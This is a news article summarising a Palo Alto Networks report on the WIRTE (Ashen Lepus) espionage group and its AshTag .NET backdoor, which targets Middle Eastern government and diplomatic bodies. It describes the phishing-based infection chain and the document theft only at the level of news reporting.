- An advanced persistent threat group named WIRTE has been using a new Malware suite called AshTag to attack Middle Eastern government and diplomatic targets since 2020.
- Palo Alto Networks tracks this group as Ashen Lepus, which continues to operate actively, including during and after the 2025 Israel-Hamas conflict.
- The campaign expanded its targets to Oman and Morocco, in addition to earlier focuses on Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt.
- AshTag operates as a modular .NET backdoor enabling persistence and remote control by masquerading as legitimate software, and it is deployed via malicious emails carrying geopolitical lures.
- The threat actor engages in espionage centered on intelligence collection, stealing sensitive documents using hands-on techniques and specialized tools for data exfiltration.
Since 2020, the advanced persistent threat group WIRTE has targeted government and diplomatic organizations across the Middle East with a previously unknown malware suite named AshTag. This campaign has been linked to espionage efforts aimed at intelligence collection. Palo Alto Networks identifies the activity cluster behind these attacks as Ashen Lepus.
According to a detailed report shared with The Hacker News, Ashen Lepus expanded its operations to Oman and Morocco, broadening its geographical focus beyond the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt. The group remained active even throughout the Israel-Hamas conflict of 2025 and continued deploying new malware variants after the October Gaza ceasefire.
WIRTE overlaps with groups such as Gaza Cyber Gang, also known by names like Blackstem, Molerats, and TA402, and has been active since at least 2018. These factions are politically motivated and linked to Hamas cyberwarfare divisions. Their attacks focus on espionage and intelligence gathering, frequently using phishing emails that contain geopolitical topics as bait. Recent email lures have targeted issues related to Turkey, suggesting a possible new focus area.
The attack starts with a decoy PDF attached to phishing emails, leading victims to download a RAR archive. This triggers a multi-stage infection that sideloads a malicious DLL named AshenLoader, which drops other components, including AshenStager, to execute the malware in memory. The AshTag backdoor is a modular .NET framework that enables persistence, remote command execution, screen capture, file management, system fingerprinting, and updating or removal of components. It disguises itself as a legitimate VisualServer utility to evade detection.
In some cases, Ashen Lepus operators have been observed manually accessing compromised machines to steal documents. Sensitive files, including diplomacy-related materials obtained from victim email inboxes, were staged locally and then exfiltrated to attacker-controlled servers using the Rclone utility.
As described, “Ashen Lepus remains a persistent espionage actor, demonstrating a clear intent to continue its operations throughout the recent regional conflict — unlike other affiliated threat groups, whose activity significantly decreased.” The group’s continued campaigns reflect a strong commitment to ongoing intelligence collection.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- US Dollar Hits 10-Year Low as Forex Bets Shift to Asian Currencies
- Fed QE Hints Spark Analyst Optimism Despite $495M Crypto Liquidations
- Crypto Markets Dip as Fed Cuts Rates; Bitcoin Holds $90K Support
- Over 700 Gogs Instances Exploited via Critical CVE-2025-8110 Flaw
- Solana (SOL) Price Crashes Despite Fed Rate Cut, Market Worries
